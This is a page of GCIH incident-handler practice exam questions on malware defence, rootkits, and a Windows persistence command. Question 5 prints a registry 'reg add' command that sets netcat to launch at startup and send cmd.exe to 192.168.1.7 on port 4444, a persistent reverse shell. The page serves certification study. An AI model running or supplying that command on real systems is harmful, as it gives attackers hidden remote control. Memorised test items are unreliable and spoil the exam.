← Back to exam page

GCIH GIAC Certified Incident Handler

Loading demo links...

Showing 4–6 of 20 questions

Question 4 (Volume B)

Mark works as a Network Administrator for NetTech Inc. The network has 150 Windows 2000 Professional client computers and four Windows 2000 servers. All the client computers are able to connect to the Internet. Mark is concerned about malware infecting the client computers through the Internet. What will Mark do to protect the client computers from malware? Each correct answer represents a complete solution. (Choose two.)

Select all that apply, then click Submit answer.

  • Educate users of the client computers to avoid malware.

  • Educate users of the client computers about the problems arising due to malware.

  • Prevent users of the client computers from executing any programs.

  • Assign Read-Only permission to the users for accessing the hard disk drives of the client computers.
Question 5 (Volume A)

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"

What task do you want to perform by running this command?

Each correct answer represents a complete solution. (Choose all that apply.)

Select all that apply, then click Submit answer.

  • You want to perform banner grabbing.

  • You want to set the Netcat to execute command any time.

  • You want to put Netcat in the stealth mode.

  • You want to add the Netcat command to the Windows registry.
Question 6 (Volume C)

John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare-secure.com. He installs a rootkit on the Linux server of the We-are-secure network. Which of the following statements are true about rootkits?

Each correct answer represents a complete solution. (Choose all that apply.)

Select all that apply, then click Submit answer.

  • They allow an attacker to conduct a buffer overflow.

  • They allow an attacker to set a Trojan in the operating system and thus open a backdoor for anytime access.

  • They allow an attacker to replace utility programs that can be used to detect the attacker's activity.

  • They allow an attacker to run packet sniffers secretly to capture passwords.